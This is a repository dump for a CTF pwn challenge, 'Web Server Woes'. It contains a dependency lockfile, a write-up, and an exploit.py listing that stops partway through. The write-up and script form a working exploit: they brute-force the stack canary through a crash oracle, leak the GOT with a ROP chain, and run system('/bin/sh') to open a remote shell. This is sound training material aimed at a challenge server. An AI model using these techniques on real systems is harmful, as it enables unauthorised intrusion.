303 |                 "sha256:5bbe06f8eeafd38e5d0a4894ffec89378b6c6a625ff57e3028921f8ff59318ac",
304 |                 "sha256:65c1a9bcdadc6c28eecee2c119465aebff8f7a584dd719facdd9e825ec61ab52",
305 |                 "sha256:68e78619a61ecf91e76aa3e6e8e33fc4894a2bebe93410754bd28fce0a8a4f9f",
306 |                 "sha256:69c0f17e9f5a7afdf2cc9fb2d1ce6aabdb3bafb7f38017c0b77862bcec2bbad8",
307 |                 "sha256:6b2b56950d93e41f33b4223ead100ea0fe11f8e6ee5f641eb753ce4b77a7042b",
308 |                 "sha256:715d3562f79d540f251b99ebd6d8baa547118974341db04f5ad06d5ea3eb8007",
309 |                 "sha256:787003c0ddb00500e49a10f2844fac87aa6ce977b90b0feaaf9de23c22508b24",
310 |                 "sha256:7ef3cb2ebbf91e330e3bb937efada0edd9003683db6b57bb108c4001f37a02ea",
311 |                 "sha256:8023faf4e01efadfa183e863fefde0046de576c6f14659e8782065bcece22198",
312 |                 "sha256:8758846a7e80910096950b67071243da3e5a20ed2546e6392603c096778d48e0",
313 |                 "sha256:8afafd99945ead6e075b973fefa56379c5b5c53fd8937dad92c662da5d8fd5ee",
314 |                 "sha256:8c41976a29d078bb235fea9b2ecd3da465df42a562910f9022f1a03107bd02be",
315 |                 "sha256:8e254ae696c88d98da6555f5ace2279cf7cd5b3f52be2b5cf97feafe883b58d2",
316 |                 "sha256:8f9293864fe09b8149f0cc42ce56e3f0e54de883a9de90cd427f191c346eb2e1",
317 |                 "sha256:9402b03f1a1b4dc4c19845e5c749e3ab82d5078d16a2a4c2cd2df62d57bb0707",
318 |                 "sha256:962f82a3086483f5e5f64dbad880d31038b698494799b097bc59c2edf392fce6",
319 |                 "sha256:9aad3c1755095ce347e26488214ef77e0485a3c34a50c5a5e2471dff60b9dd9c",
320 |                 "sha256:9dcdfd0eaf283af041973bff14a2e143b8bd64e069f4c383416ecd79a81aab58",
321 |                 "sha256:aa57bd9cf8ae831a362185ee444e15a93ecb2e344c8e52e4d721ea3ab6ef1823",
322 |                 "sha256:aa7bd130efab1c280bed0f45501b7c8795f9fdbeb02e965371bbef3523627779",
323 |                 "sha256:ab4a0df41e7c16a1392727727e7998a467472d0ad65f3ad5e6e765015df08636",
324 |                 "sha256:ad9e82fb8f09ade1c3e1b996a6337afac2b8b9e365f926f5a61aacc71adc5b3c",
325 |                 "sha256:af598ed32d6ae86f1b747b82783958b1a4ab8f617b06fe68795c7f026abbdcad",
326 |                 "sha256:b076b6226fb84157e3f7c971a47ff3a679d837cf338547532ab866c57930dbee",
327 |                 "sha256:b7ff0f54cb4ff66dd38bebd335a38e2c22c41a8ee45aa608efc890ac3e3931bc",
328 |                 "sha256:bfce63a9e7834b12b87c64d6b155fdd9b3b96191b6bd334bf37db7ff1fe457f2",
329 |                 "sha256:c011a4149cfbcf9f03994ec2edffcb8b1dc2d2aede7ca243746df97a5d41ce48",
330 |                 "sha256:c9c804664ebe8f83a211cace637506669e7890fec1b4195b505c214e50dd4eb7",
331 |                 "sha256:ca379055a47383d02a5400cb0d110cef0a776fc644cda797db0c5696cfd7e18e",
332 |                 "sha256:cb0932dc158471523c9637e807d9bfb93e06a95cbf010f1a38b98623b929ef2b",
333 |                 "sha256:cd0f502fe016460680cd20aaa5a76d241d6f35a1c3350c474bac1273803893fa",
334 |                 "sha256:ceb01949af7121f9fc39f7d27f91be8546f3fb112c608bc4029aef0bab86a2a5",
335 |                 "sha256:d080e0a5eb2529460b30190fcfcc4199bd7f827663f858a226a81bc27beaa97e",
336 |                 "sha256:dd15ff04ffd7e05ffcb7fe79f1b98041b8ea30ae9234aed2a9168b5797c3effb",
337 |                 "sha256:df0be2b576a7abbf737b1575f048c23fb1d769f267ec4358296f31c2479db8f9",
338 |                 "sha256:e09031c87a1e51556fdcb46e5bd4f59dfb743061cf93c4d6831bf894f125eb57",
339 |                 "sha256:e4dd52d80b8c83fdce44e12478ad2e85c64ea965e75d66dbeafb0a3e77308fcc",
340 |                 "sha256:f698de3fd0c4e6972b92290a45bd9b1536bffe8c6759c62471efaa8acb4c37bc",
341 |                 "sha256:fec21693218efe39aa7f8599346e90c705afa52c5b31ae019b2e57e8f6542bb2",
342 |                 "sha256:ffcc3f7c66b5f5b7931a5aa68fc9cecc51e685ef90282f4a82f0f5e9b704ad11"
343 |             ],
344 |             "markers": "python_version >= '3.7'",
345 |             "version": "==2.1.3"
346 |         },
347 |         "packaging": {
348 |             "hashes": [
349 |                 "sha256:048fb0e9405036518eaaf48a55953c750c11e1a1b68e0dd1a9d62ed0c092cfc5",
350 |                 "sha256:8c491190033a9af7e1d931d0b5dacc2ef47509b34dd0de67ed209b5203fc88c7"
351 |             ],
352 |             "markers": "python_version >= '3.7'",
353 |             "version": "==23.2"
354 |         },
355 |         "paramiko": {
356 |             "hashes": [
357 |                 "sha256:6a3777a961ac86dbef375c5f5b8d50014a1a96d0fd7f054a43bc880134b0ff77",
358 |                 "sha256:b7bc5340a43de4287bbe22fe6de728aa2c22468b2a849615498dd944c2f275eb"
359 |             ],
360 |             "markers": "python_version >= '3.6'",
361 |             "version": "==3.3.1"
362 |         },
363 |         "pip": {
364 |             "hashes": [
365 |                 "sha256:bb7d4f69f488432e4e96394612f43ab43dd478d073ef7422604a570f7157561e",
366 |                 "sha256:bc38bb52bc286514f8f7cb3a1ba5ed100b76aaef29b521d48574329331c5ae7b"
367 |             ],
368 |             "markers": "python_version >= '3.7'",
369 |             "version": "==23.3"
370 |         },
371 |         "plumbum": {
372 |             "hashes": [
373 |                 "sha256:3ad9e5f56c6ec98f6f7988f7ea8b52159662ea9e915868d369dbccbfca0e367e",
374 |                 "sha256:9e6dc032f4af952665f32f3206567bc23b7858b1413611afe603a3f8ad9bfd75"
375 |             ],
376 |             "markers": "python_version >= '3.6'",
377 |             "version": "==1.8.2"
378 |         },
379 |         "psutil": {
380 |             "hashes": [
381 |                 "sha256:10e8c17b4f898d64b121149afb136c53ea8b68c7531155147867b7b1ac9e7e28",
382 |                 "sha256:18cd22c5db486f33998f37e2bb054cc62fd06646995285e02a51b1e08da97017",
383 |                 "sha256:3ebf2158c16cc69db777e3c7decb3c0f43a7af94a60d72e87b2823aebac3d602",
384 |                 "sha256:51dc3d54607c73148f63732c727856f5febec1c7c336f8f41fcbd6315cce76ac",
385 |                 "sha256:6e5fb8dc711a514da83098bc5234264e551ad980cec5f85dabf4d38ed6f15e9a",
386 |                 "sha256:70cb3beb98bc3fd5ac9ac617a327af7e7f826373ee64c80efd4eb2856e5051e9",
387 |                 "sha256:748c9dd2583ed86347ed65d0035f45fa8c851e8d90354c122ab72319b5f366f4",
388 |                 "sha256:91ecd2d9c00db9817a4b4192107cf6954addb5d9d67a969a4f436dbc9200f88c",
389 |                 "sha256:92e0cc43c524834af53e9d3369245e6cc3b130e78e26100d1f63cdb0abeb3d3c",
390 |                 "sha256:a6f01f03bf1843280f4ad16f4bde26b817847b4c1a0db59bf6419807bc5ce05c",
391 |                 "sha256:c69596f9fc2f8acd574a12d5f8b7b1ba3765a641ea5d60fb4736bf3c08a8214a",
392 |                 "sha256:ca2780f5e038379e520281e4c032dddd086906ddff9ef0d1b9dcf00710e5071c",
393 |                 "sha256:daecbcbd29b289aac14ece28eca6a3e60aa361754cf6da3dfb20d4d32b6c7f57",
394 |                 "sha256:e4b92ddcd7dd4cdd3f900180ea1e104932c7bce234fb88976e2a3b296441225a",
395 |                 "sha256:fb8a697f11b0f5994550555fcfe3e69799e5b060c8ecf9e2f75c69302cc35c0d",
396 |                 "sha256:ff18b8d1a784b810df0b0fff3bcb50ab941c3b8e2c8de5726f9c71c601c611aa"
397 |             ],
398 |             "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4, 3.5'",
399 |             "version": "==5.9.6"
400 |         },
401 |         "pwntools": {
402 |             "hashes": [
403 |                 "sha256:a85f1e777f343f91e221d175e1523d006eef1c8106c10fd2e338280bab273fa6",
404 |                 "sha256:c16b3ee4479b87b87d7803085a04185bd4eeaaf3f5e2dd6196a6941c3b09aecd"
405 |             ],
406 |             "index": "pypi",
407 |             "markers": "python_version >= '2.7'",
408 |             "version": "==4.11.0"
409 |         },
410 |         "pycparser": {
411 |             "hashes": [
412 |                 "sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9",
413 |                 "sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206"
414 |             ],
415 |             "version": "==2.21"
416 |         },
417 |         "pyelftools": {
418 |             "hashes": [
419 |                 "sha256:2fc92b0d534f8b081f58c7c370967379123d8e00984deb53c209364efd575b40",
420 |                 "sha256:544c3440eddb9a0dce70b6611de0b28163d71def759d2ed57a0d00118fc5da86"
421 |             ],
422 |             "markers": "python_version >= '3'",
423 |             "version": "==0.30"
424 |         },
425 |         "pygments": {
426 |             "hashes": [
427 |                 "sha256:13fc09fa63bc8d8671a6d247e1eb303c4b343eaee81d861f3404db2935653692",
428 |                 "sha256:1daff0494820c69bc8941e407aa20f577374ee88364ee10a98fdbe0aece96e29"
429 |             ],
430 |             "markers": "python_version >= '3.7'",
431 |             "version": "==2.16.1"
432 |         },
433 |         "pynacl": {
434 |             "hashes": [
435 |                 "sha256:06b8f6fa7f5de8d5d2f7573fe8c863c051225a27b61e6860fd047b1775807858",
436 |                 "sha256:0c84947a22519e013607c9be43706dd42513f9e6ae5d39d3613ca1e142fba44d",
437 |                 "sha256:20f42270d27e1b6a29f54032090b972d97f0a1b0948cc52392041ef7831fee93",
438 |                 "sha256:401002a4aaa07c9414132aaed7f6836ff98f59277a234704ff66878c2ee4a0d1",
439 |                 "sha256:52cb72a79269189d4e0dc537556f4740f7f0a9ec41c1322598799b0bdad4ef92",
440 |                 "sha256:61f642bf2378713e2c2e1de73444a3778e5f0a38be6fee0fe532fe30060282ff",
441 |                 "sha256:8ac7448f09ab85811607bdd21ec2464495ac8b7c66d146bf545b0f08fb9220ba",
442 |                 "sha256:a36d4a9dda1f19ce6e03c9a784a2921a4b726b02e1c736600ca9c22029474394",
443 |                 "sha256:a422368fc821589c228f4c49438a368831cb5bbc0eab5ebe1d7fac9dded6567b",
444 |                 "sha256:e46dae94e34b085175f8abb3b0aaa7da40767865ac82c928eeb9e57e1ea8a543"
445 |             ],
446 |             "markers": "python_version >= '3.6'",
447 |             "version": "==1.5.0"
448 |         },
449 |         "pyserial": {
450 |             "hashes": [
451 |                 "sha256:3c77e014170dfffbd816e6ffc205e9842efb10be9f58ec16d3e8675b4925cddb",
452 |                 "sha256:c4451db6ba391ca6ca299fb3ec7bae67a5c55dde170964c7a14ceefec02f2cf0"
453 |             ],
454 |             "version": "==3.5"
455 |         },
456 |         "pysocks": {
457 |             "hashes": [
458 |                 "sha256:08e69f092cc6dbe92a0fdd16eeb9b9ffbc13cadfe5ca4c7bd92ffb078b293299",
459 |                 "sha256:2725bd0a9925919b9b51739eea5f9e2bae91e83288108a9ad338b2e3a4435ee5",
460 |                 "sha256:3f8804571ebe159c380ac6de37643bb4685970655d3bba243530d6558b799aa0"
461 |             ],
462 |             "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'",
463 |             "version": "==1.7.1"
464 |         },
465 |         "python-dateutil": {
466 |             "hashes": [
467 |                 "sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86",
468 |                 "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9"
469 |             ],
470 |             "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2'",
471 |             "version": "==2.8.2"
472 |         },
473 |         "requests": {
474 |             "hashes": [
475 |                 "sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f",
476 |                 "sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1"
477 |             ],
478 |             "markers": "python_version >= '3.7'",
479 |             "version": "==2.31.0"
480 |         },
481 |         "ropgadget": {
482 |             "hashes": [
483 |                 "sha256:394ba571277a28a987116fa91c5336524f9a89e9b60a54ba97f2c34823bd0270",
484 |                 "sha256:5bc70eee0ffee45f683df57eaea3e0692bbea3f35200f3cf5a1cf28d7d61a774",
485 |                 "sha256:a40626a32cf867d06192ef24e16221b2b7ba82e2ec84ab5bfdfb0b017559342f"
486 |             ],
487 |             "version": "==7.4"
488 |         },
489 |         "rpyc": {
490 |             "hashes": [
491 |                 "sha256:6e8153792ac221a80f420d2e0b241a10c6e43b105d325998b18a4e7af329f9ec",
492 |                 "sha256:f2233174879faf18ae266437d5a65511ce46c817cec4edc1344f036758cfbf52"
493 |             ],
494 |             "markers": "python_version >= '3.7'",
495 |             "version": "==5.3.1"
496 |         },
497 |         "six": {
498 |             "hashes": [
499 |                 "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926",
500 |                 "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254"
501 |             ],
502 |             "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2'",
503 |             "version": "==1.16.0"
504 |         },
505 |         "sortedcontainers": {
506 |             "hashes": [
507 |                 "sha256:25caa5a06cc30b6b83d11423433f65d1f9d76c4c6a0c90e3379eaa43b9bfdb88",
508 |                 "sha256:a163dcaede0f1c021485e957a39245190e74249897e2ae4b2aa38595db237ee0"
509 |             ],
510 |             "version": "==2.4.0"
511 |         },
512 |         "unicorn": {
513 |             "hashes": [
514 |                 "sha256:0bd05f9ae6b86b1326e6c3c1d1f3e51264b479cd1961388fd0da0ae674ec0195",
515 |                 "sha256:2b3eba8848f3cfd43ed5f3128f01880ecc4e73e6b36c1e5e951177db0fb9c03b",
516 |                 "sha256:2d3eb3ec7eabbc4e66b4d853e11b27c426ce03072860c756139ed2191588751c",
517 |                 "sha256:45be711d2bc8b82d07f2e0bdde128f3e9408c42978a3ed5edf709bce5350fcdf",
518 |                 "sha256:4cf11d4883160dd3c4967bb3187dd886cdca4422884b315ace436af6047aae0d",
519 |                 "sha256:5ed85a0b7bbfa47dd029272e071c814f21e9dacc2eefd63521f4d638ff1d6db9",
520 |                 "sha256:7145fe448d17b2377b18e08e0521749cf0f94b9d3fe8b67c032bb4c932a21c29",
521 |                 "sha256:7fc69523eb83b4c8abc7cb4410ca21875e066c34b7afe998f59481e830d28e56",
522 |                 "sha256:9f0e3bbe207a6d2ddd3dff528bf3b2251c8e11d0fb4bab2338dff01475f6f41b"
523 |             ],
524 |             "version": "==2.0.1.post1"
525 |         },
526 |         "urllib3": {
527 |             "hashes": [
528 |                 "sha256:7a7c7003b000adf9e7ca2a377c9688bbc54ed41b985789ed576570342a375cd2",
529 |                 "sha256:b19e1a85d206b56d7df1d5e683df4a7725252a964e3993648dd0fb5a1c157564"
530 |             ],
531 |             "markers": "python_version >= '3.7'",
532 |             "version": "==2.0.6"
533 |         }
534 |     },
535 |     "develop": {}
536 | }
537 | 


--------------------------------------------------------------------------------
/pwn/web-server-woes/README.md:
--------------------------------------------------------------------------------
  1 | # Web Server Woes
  2 | 
  3 | The challenge description reads:
  4 | 
  5 | > I had this great product idea, and made my own web server to host it! Its blazing fast.\
  6 | > Create yourself a new instance at: http://celsius.blockharbor.io:8080
  7 | 
  8 | At the given link we are able to spin up a docker container, which will expose an instance of the
  9 | web server over a random ephemeral port on the celsius.blockharbor.io domain. The website, itself,
 10 | isn't too interesting. It appears to serve only a single static HTML page, and only accepts HTTP GET
 11 | requests. The challenge description also includes an [a.out](a.out) file for us to download, which
 12 | presumably is the custom web server executable. Opening the binary up in
 13 | [Ghidra](https://ghidra-sre.org/) and reverse engineering it reveals that it is, indeed.
 14 | 
 15 | > **_TIP:_** Import [a.out.gzf](a.out.gzf) into Ghidra to get the already reversed executable.
 16 | 
 17 | There is a classic stack buffer overflow vulnerability in the `handle_conn` function on line 19,
 18 | where the server reads in 1064 bytes into a 1032-byte buffer. The binary has been compiled with all
 19 | protections enabled (i.e. full RELRO, stack canaries, NX enabled, and ASLR), as can be seen by
 20 | running [checksec](https://github.com/slimm609/checksec.sh) on it. This is going to make
 21 | exploitation a bit trickier, but not impossible.
 22 | 
 23 | ![Stack Buffer Overflow Vulnerability](decomp-vuln.png)
 24 | 
 25 | The first protection we need to defeat is the stack canary. This is typically done by leaking the
 26 | canary value, and then overwriting it with itself to avoid triggering stack-smashing detection;
 27 | however, in this case there is no obvious way to leak it. Two important things to notice, though,
 28 | are that the server forks a new child process for each connection, and that we receive a response to
 29 | our HTTP GET queries when we do not overflow the buffer, and no response when we do. The first part
 30 | means that crashing the child process doesn't crash the web server, so the stack canary will be the
 31 | same every time. The second part reveals that we can use the presence (or lack thereof) of a server
 32 | response as an oracle to determine when we have induced a crash. With the oracle, we can leak the
 33 | value of the stack canary byte-by-byte. For the first iteration, all we need to do is completely
 34 | fill the buffer, and then overwrite the first byte of the canary with `0x00`, then `0x01`, then
 35 | `0x02`, and so on until `0xff`. The byte value where we still receive a response from the server
 36 | (i.e. do not induce a crash) is the correct value. We then just repeat this process for each byte of
 37 | the canary until we have leaked all 8 bytes. This will require `8 * 256 = 2048` queries in the worst
 38 | case (i.e. for a theoretical canary value of `0xffffffffffffffff`). In practice, though, 64-bit
 39 | Linux operating systems will choose `0x00` for the least-significant byte (i.e. to thwart buffer
 40 | overflow attacks resulting from operations on null-terminated strings), and the other 7 bytes will
 41 | be random. For reasons that will become clear soon, we should also go ahead and leak the frame
 42 | pointer and return address values from the stack.
 43 | 
 44 | ```py
 45 | host = 'celsius.blockharbor.io'
 46 | port = '<ephemeral port>'
 47 | 
 48 | junk = b'A' * 1027
 49 | 
 50 | def request(host, port, data):
 51 |     if DEBUG:
 52 |         print(f'Trying {data[-1]:02x} ...')
 53 |     with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
 54 |         s.connect((host, port))
 55 |         s.sendall(data)
 56 |         try:
 57 |             return s.recv(1) != b''
 58 |         except socket.timeout:
 59 |             return False
 60 | 
 61 | stack = b''
 62 | 
 63 | # Leak the stack canary and frame pointer.
 64 | for i in range(16):
 65 |     for b in range(256):
 66 |         c = bytes([ b ])
 67 |         data = b'GET /' + junk + stack + c
 68 |         if request(host, port, data):
 69 |             print(f'Stack[{i}] = {b:02x}')
 70 |             stack += c
 71 |             break
 72 |     else:
 73 |         print(f'Failed to leak the stack')
 74 |         sys.exit(1)
 75 | 
 76 | # Least-significant byte of the correct return address
 77 | stack += b'\xa1'
 78 | 
 79 | # Leak the return address.
 80 | for i in range(17, 24):
 81 |     for b in range(256):
 82 |         c = bytes([ b ])
 83 |         data = b'GET /' + junk + stack + c
 84 |         if request(host, port, data):
 85 |             print(f'Stack[{i}] = {b:02x}')
 86 |             stack += c
 87 |             break
 88 |     else:
 89 |         print(f'Failed to leak the stack')
 90 |         sys.exit(1)
 91 | 
 92 | print()
 93 | 
 94 | chk = int.from_bytes(stack[ 0: 8], byteorder='little')
 95 | rbp = int.from_bytes(stack[ 8:16], byteorder='little')
 96 | rip = int.from_bytes(stack[16:24], byteorder='little')
 97 | ```
 98 | 
 99 | Once we have leaked the stack canary, frame pointer, and return address, the next step is to bypass
100 | ASLR. We can already determine where the image and stack are loaded in memory, but we still don't
101 | know where Libc is. We can figure this out by leaking addresses from the global offset table (GOT),
102 | but to do this we're going to have to execute some shellcode. Recall, though, that the binary has
103 | the NX bit set, so the stack will not be executable. We, therefore, have to use return-oriented
104 | programming (ROP) to execute multiple short sequences of instructions that will progressively do
105 | what we want.
106 | 
107 | We can use [ropper](https://github.com/sashs/Ropper) to easily find potentially useful gadgets in
108 | the binary. The ones I used in my exploit are:
109 | 
110 | ```py
111 | pop_rsp_gadget = txt_base + 0x0000097d  # pop rsp; pop r13; pop r14; pop r15; ret;
112 | pop_rdi_gadget = txt_base + 0x00000983  # pop rdi; ret;
113 | pop_rsi_gadget = txt_base + 0x00000981  # pop rsi; pop r15; ret;
114 | pop_rdx_gadget = txt_base + 0x00000414  # pop rdx; ret;
115 | ret_gadget     = txt_base + 0x0000001a  # ret;
116 | ```
117 | 
118 | The `pop rsp` gadget is necessary because we can only write up to 32 bytes beyond the end of the
119 | stack buffer. Considering that the return address is located at a 16-byte offset from the end of the
120 | buffer, we only have enough room to execute a single gadget before we need to pivot the stack.
121 | Therefore, the first gadget in any ROP chain we construct should be a pivot to the beginning of the
122 | stack buffer we just overflowed. The first 24 bytes of our HTTP GET request will be popped into
123 | registers `r13`, `r14`, and `r15`, so we just need to place our ROP chain (after the pivot) at
124 | offset 24 from the beginning of our request.
125 | 
126 | Below is the ROP chain I constructed to leak an arbitrary amount of data from any memory address.
127 | 
128 | ```py
129 | def leak(addr, size):
130 |     payload  = b'GET ///\x00'           # pop r13
131 |     payload += p64(0xaaaaaaaaaaaaaaaa)  # pop r14
132 |     payload += p64(0xbbbbbbbbbbbbbbbb)  # pop r15
133 | 
134 |     # write(4, addr, size)
135 |     payload += p64(pop_rdi_gadget)      # ret
136 |     payload += p64(4)                   # pop rdi
137 |     payload += p64(pop_rsi_gadget)      # ret
138 |     payload += p64(addr)                # pop rsi
139 |     payload += p64(0xcccccccccccccccc)  # pop r15
140 |     payload += p64(pop_rdx_gadget)      # ret
141 |     payload += p64(size)                # pop rdx
142 |     payload += p64(write_plt_addr)      # ret
143 | 
144 |     # exit(0)
145 |     payload += p64(pop_rdi_gadget)      # ret
146 |     payload += p64(0)                   # pop rax
147 |     payload += p64(exit_plt_addr)       # ret
148 | 
149 |     payload += b'A' * (1032 - len(payload))
150 | 
151 |     payload += p64(chk)
152 |     payload += p64(rbp)
153 | 
154 |     payload += p64(pop_rsp_gadget)      # ret       <- execution starts here
155 |     payload += p64(buf_base)            # pop rsp
156 | 
157 |     with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
158 |         s.connect((host, port))
159 |         s.sendall(payload)
160 |         res = s.recv(size)
161 | 
162 |     return res
163 | 
164 | # Dump the global offset table.
165 | got_leak = leak(got_base, got_size)
166 | 
167 | print('GOT:')
168 | hexdump(got_leak)
169 | print()
170 | ```
171 | 
172 | Even after dumping the GOT, we  still don't know for sure where Libc is loaded in memory. We first
173 | have to determine the specific version that is being used, since that will help us figure out the
174 | offset of each function in Libc's `.text` section. To determine the  version, we need to enter at
175 | least two different leaked pointers into a [Libc database searcher](https://libc.rip/). Using the
176 | leaked addresses from the GOT reveals that the web server is using either v2.27 or v2.37 of
177 | libc.so.6. Now we can compute the offset of Libc in memory and find the addresses of other functions
178 | and symbols of interest to us.
179 | 
180 | Finally, the last step is to execute a ROP chain that calls `system("/bin/sh")` to pop a shell on
181 | the server.
182 | 
183 | ```py
184 | def exploit(conn):
185 |     payload  = b'GET ///\x00'           # pop r13
186 |     payload += p64(0xaaaaaaaaaaaaaaaa)  # pop r14
187 |     payload += p64(0xbbbbbbbbbbbbbbbb)  # pop r15
188 | 
189 |     # dup2(4, 0)
190 |     payload += p64(pop_rdi_gadget)      # ret
191 |     payload += p64(4)                   # pop rdi
192 |     payload += p64(pop_rsi_gadget)      # ret
193 |     payload += p64(0)                   # pop rsi
194 |     payload += p64(0xcccccccccccccccc)  # pop r15
195 |     payload += p64(dup2_addr)           # ret
196 | 
197 |     # dup2(4, 1)
198 |     payload += p64(pop_rdi_gadget)      # ret
199 |     payload += p64(4)                   # pop rdi
200 |     payload += p64(pop_rsi_gadget)      # ret
201 |     payload += p64(1)                   # pop rsi
202 |     payload += p64(0xcccccccccccccccc)  # pop r15
203 |     payload += p64(dup2_addr)           # ret
204 | 
205 |     # dup2(4, 2)
206 |     payload += p64(pop_rdi_gadget)      # ret
207 |     payload += p64(4)                   # pop rdi
208 |     payload += p64(pop_rsi_gadget)      # ret
209 |     payload += p64(2)                   # pop rsi
210 |     payload += p64(0xcccccccccccccccc)  # pop r15
211 |     payload += p64(dup2_addr)           # ret
212 | 
213 |     # Re-align the stack ...
214 |     payload += p64(ret_gadget)          # ret
215 | 
216 |     # system("/bin/sh")
217 |     payload += p64(pop_rdi_gadget)      # ret
218 |     payload += p64(bin_sh_addr)         # pop rdi
219 |     payload += p64(system_addr)         # ret
220 | 
221 |     # exit(0)
222 |     payload += p64(pop_rdi_gadget)      # ret
223 |     payload += p64(0)                   # pop rax
224 |     payload += p64(exit_plt_addr)       # ret
225 | 
226 |     payload += b'A' * (1032 - len(payload))
227 | 
228 |     payload += p64(chk)
229 |     payload += p64(rbp)
230 | 
231 |     payload += p64(pop_rsp_gadget)      # ret       <- execution starts here
232 |     payload += p64(buf_base)            # pop rsp
233 | 
234 |     print(f'Payload:')
235 |     # hexdump(payload)
236 |     print(payload)
237 |     print()
238 | 
239 |     conn.send(payload)
240 |     conn.interactive()
241 | 
242 | exploit(remote(host, port))
243 | ```
244 | 
245 | With our remote shell, we can now print the flag that is located in the web root's parent directory.
246 | 
247 | **Flag:** `bh{fu1l_pr0t3ct1on_full_pwn}`
248 | 


--------------------------------------------------------------------------------
/pwn/web-server-woes/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pwnalone/bhctf/754978c6749f7e3b5b532e1c2a2f59c282c7314c/pwn/web-server-woes/a.out


--------------------------------------------------------------------------------
/pwn/web-server-woes/a.out.gzf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pwnalone/bhctf/754978c6749f7e3b5b532e1c2a2f59c282c7314c/pwn/web-server-woes/a.out.gzf


--------------------------------------------------------------------------------
/pwn/web-server-woes/decomp-vuln.png:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:605133a52a0af314c20d9d1472b8f0d7d42d605d803059d060bb337241aedb0e
3 | size 131307
4 | 


--------------------------------------------------------------------------------
/pwn/web-server-woes/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | 
  3 | from binascii import hexlify
  4 | from pwn import *
  5 | import socket
  6 | import sys
  7 | 
  8 | DEBUG = True
  9 | 
 10 | if len(sys.argv) != 3 and len(sys.argv) != 6:
 11 |     print('Usage: python exploit.py <host> <port> [chk rbp rip]')
 12 |     sys.exit(0)
 13 | 
 14 | host = sys.argv[1]
 15 | port = sys.argv[2]
 16 | port = int(port)
 17 | 
 18 | junk = b'A' * 1027
 19 | 
 20 | if len(sys.argv) == 3:
 21 |     def request(host, port, data):
 22 |         if DEBUG:
 23 |             print(f'Trying {data[-1]:02x} ...')
 24 |         with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
 25 |             s.connect((host, port))
 26 |             s.sendall(data)
 27 |             try:
 28 |                 return s.recv(1) != b''
 29 |             except socket.timeout:
 30 |                 return False
 31 | 
 32 |     stack = b''
 33 | 
 34 |     # Leak the stack canary and frame pointer.
 35 |     for i in range(16):
 36 |         for b in range(256):
 37 |             c = bytes([ b ])
 38 |             data = b'GET /' + junk + stack + c
 39 |             if request(host, port, data):
 40 |                 print(f'Stack[{i}] = {b:02x}')
 41 |                 stack += c
 42 |                 break
 43 |         else:
 44 |             print(f'Failed to leak the stack')
 45 |             sys.exit(1)
 46 | 
 47 |     # Least-significant byte of the correct return address
 48 |     stack += b'\xa1'
 49 | 
 50 |     # Leak the return address.
 51 |     for i in range(17, 24):
 52 |         for b in range(256):
 53 |             c = bytes([ b ])
 54 |             data = b'GET /' + junk + stack + c
 55 |             if request(host, port, data):
 56 |                 print(f'Stack[{i}] = {b:02x}')
 57 |                 stack += c
 58 |                 break
 59 |         else:
 60 |             print(f'Failed to leak the stack')
 61 |             sys.exit(1)
 62 | 
 63 |     print()
 64 | 
 65 |     chk = int.from_bytes(stack[ 0: 8], byteorder='little')
 66 |     rbp = int.from_bytes(stack[ 8:16], byteorder='little')
 67 |     rip = int.from_bytes(stack[16:24], byteorder='little')
 68 | else:
 69 |     # Already have our initial leaks ...
 70 |     chk = int(sys.argv[3], 16)
 71 |     rbp = int(sys.argv[4], 16)
 72 |     rip = int(sys.argv[5], 16)
 73 | 
 74 | print(f'chk = {chk:016x}')
 75 | print(f'rbp = {rbp:016x}')
 76 | print(f'rip = {rip:016x}')
 77 | print()
 78 | 
 79 | stk_base = rbp - 0x0001f550
 80 | txt_base = rip - 0x000008a1
 81 | buf_base = stk_base + 0x0001f0f0
 82 | got_base = txt_base + 0x00002ee0
 83 | got_size = 288
 84 | 
 85 | print(f'stack base @ {stk_base:016x}')
 86 | print(f'.text base @ {txt_base:016x}')
 87 | print(f'.got  base @ {got_base:016x}')
 88 | print()
 89 | 
 90 | pop_rsp_gadget = txt_base + 0x0000097d  # pop rsp; pop r13; pop r14; pop r15; ret;
 91 | pop_rdi_gadget = txt_base + 0x00000983  # pop rdi; ret;
 92 | pop_rsi_gadget = txt_base + 0x00000981  # pop rsi; pop r15; ret;
 93 | pop_rdx_gadget = txt_base + 0x00000414  # pop rdx; ret;
 94 | ret_gadget     = txt_base + 0x0000001a  # ret;
 95 | 
 96 | write_plt_addr = txt_base + 0x00000240  # write@plt
 97 | exit_plt_addr  = txt_base + 0x00000380  # exit@plt
 98 | 
 99 | def leak(addr, size):
100 |     payload  = b'GET ///\x00'           # pop r13
101 |     payload += p64(0xaaaaaaaaaaaaaaaa)  # pop r14
102 |     payload += p64(0xbbbbbbbbbbbbbbbb)  # pop r15
103 | 
104 |     # write(4, addr, size)
105 |     payload += p64(pop_rdi_gadget)      # ret
106 |     payload += p64(4)                   # pop rdi
107 |     payload += p64(pop_rsi_gadget)      # ret
108 |     payload += p64(addr)                # pop rsi
109 |     payload += p64(0xcccccccccccccccc)  # pop r15
110 |     payload += p64(pop_rdx_gadget)      # ret
111 |     payload += p64(size)                # pop rdx
112 |     payload += p64(write_plt_addr)      # ret
113 | 
114 |     # exit(0)
